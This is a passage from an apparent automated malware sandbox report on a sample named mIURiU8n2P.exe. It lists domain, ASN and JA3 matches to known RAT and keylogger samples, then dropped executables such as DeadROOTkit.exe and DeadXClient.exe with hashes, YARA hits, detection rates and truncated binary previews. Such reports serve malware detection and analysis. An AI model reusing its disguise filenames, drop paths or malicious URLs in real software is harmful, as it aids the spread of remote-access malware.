                                                d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.com80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 208.95.112.1
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PO.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      api.telegram.org8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 149.154.167.220
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 149.154.167.220
                                                      1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 149.154.167.220
                                                      PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      SALSGIVERUS8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 147.185.221.23
                                                      7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      5q4X9fRo4b.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 147.185.221.17
                                                      TELEGRAMRU8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 149.154.167.220
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 149.154.167.220
                                                      1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 149.154.167.220
                                                      PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      TUT-ASUS80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 208.95.112.1
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PO.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SALSGIVERUS8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 147.185.221.23
                                                      7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      5q4X9fRo4b.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 147.185.221.17

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0e8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 149.154.167.220
                                                      80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 149.154.167.220
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 149.154.167.220
                                                      jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 149.154.167.220
                                                      hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                                      • 149.154.167.220
                                                      hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                                      • 149.154.167.220
                                                      https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      https://shawri.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      https://server.h74w.com/invite/12536668Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\Public\DeadCodeRootKit.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):155136
                                                      Entropy (8bit):7.794589901193739
                                                      Encrypted:false
                                                      SSDEEP:3072:9QpsyzjtpfkzW/7F/ix/ApwXnDLn10FbxYSC/B9KIZb29b/HvX:9QpsyzjtpfOW/7FO/AKL10FbmlBoIYRn
                                                      MD5:B8479A23C22CF6FC456E197939284069
                                                      SHA1:B2D98CC291F16192A46F363D007E012D45C63300
                                                      SHA-256:18294EE5A6383A48D1BCF2703F17D815529DF3A17580E027C3EFEA1800900E8F
                                                      SHA-512:786CD468CE3723516DC869B09E008EC5D35D1F0C1A61E70083A3BE15180866BE637BD7D8665C2F0218C56875A0EE597C277E088F77DD403BDD2182D06BAD3BD4
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                      • Antivirus: Virustotal, Detection: 82%, Browse
                                                      Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........{o..............q.......q..............o.......o...............o......Rich............PE..L......f.....................N............... ....@.......................................@.................................P9..x....@..8,...................p.......8..8............................................ ...............................text............................... ..`.rdata..@.... ......................@..@.rsrc...8,...@......................@..@.reloc.......p.......\..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\Public\DeadROOTkit.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):43520
                                                      Entropy (8bit):5.571588653306265
                                                      Encrypted:false
                                                      SSDEEP:768:8kQn3SBsJVCm+1pout8PKiFF+g9h7ey96FOChJ8gL7Zs6r:83dJYDLqvFn9wy96FOCsg7
                                                      MD5:7DD98FC2976EE270A278E1A9A28EEFAE
                                                      SHA1:0497EE045226B2D310C7678ED055EEEDBC88DC77
                                                      SHA-256:5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
                                                      SHA-512:94CAB0F684F79E7ADB6BEA43A909D9621A2EF6BF223FBF4650B040766E7EDFC95D77F62AA852EFCCB7752442E96182329934EEE58AD4B8F579A75BD8414D984C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 64%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3..f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........^..x_............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                      C:\Users\Public\DeadXClient.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):35840
                                                      Entropy (8bit):5.5592928582204815
                                                      Encrypted:false
                                                      SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                      MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                      SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                      SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                      • Antivirus: Virustotal, Detection: 71%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........S...L............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                      C:\Users\Public\Deadsvchost.exe

                                                      Download File
                                                      Process:C:\Users\Public\DeadXClient.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):35840
                                                      Entropy (8bit):5.5592928582204815
                                                      Encrypted:false
                                                      SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                      MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                      SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                      SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                      • Antivirus: Virustotal, Detection: 71%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........S...L............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                      C:\Users\user\AppData\Local\DeadROOTkit.exe

                                                      Download File
                                                      Process:C:\Users\Public\DeadROOTkit.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):43520
                                                      Entropy (8bit):5.571588653306265
                                                      Encrypted:false
                                                      SSDEEP:768:8kQn3SBsJVCm+1pout8PKiFF+g9h7ey96FOChJ8gL7Zs6r:83dJYDLqvFn9wy96FOCsg7
                                                      MD5:7DD98FC2976EE270A278E1A9A28EEFAE
                                                      SHA1:0497EE045226B2D310C7678ED055EEEDBC88DC77
                                                      SHA-256:5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
                                                      SHA-512:94CAB0F684F79E7ADB6BEA43A909D9621A2EF6BF223FBF4650B040766E7EDFC95D77F62AA852EFCCB7752442E96182329934EEE58AD4B8F579A75BD8414D984C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 64%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3..f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........^..x_............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Deadsvchost.exe.log

                                                      Download File
                                                      Process:C:\Users\Public\Deadsvchost.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mIURiU8n2P.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):1088
                                                      Entropy (8bit):5.389928136181357
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                                      MD5:6B2359BF987F4BDAF6CB014F63217859
                                                      SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                                      SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                                      SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                                      C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                                                      Download File
                                                      Process:C:\Windows\System32\lsass.exe
                                                      File Type:very short file (no magic)
                                                      Category:modified
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:93B885ADFE0DA089CDF634904FD59F71
                                                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                      Malicious:false
                                                      Preview:.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                                      Download File
                                                      Process:C:\Users\Public\DeadROOTkit.exe
                                                      File Type:Generic INItialization configuration [WIN]
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):3.6722687970803873
                                                      Encrypted:false
                                                      SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                      MD5:DE63D53293EBACE29F3F54832D739D40
                                                      SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                      SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                      SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                      Malicious:false
                                                      Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wjc1kjd.roa.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_auy5zpai.zou.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1zi1ylq.sxc.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0hslumj.g1z.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
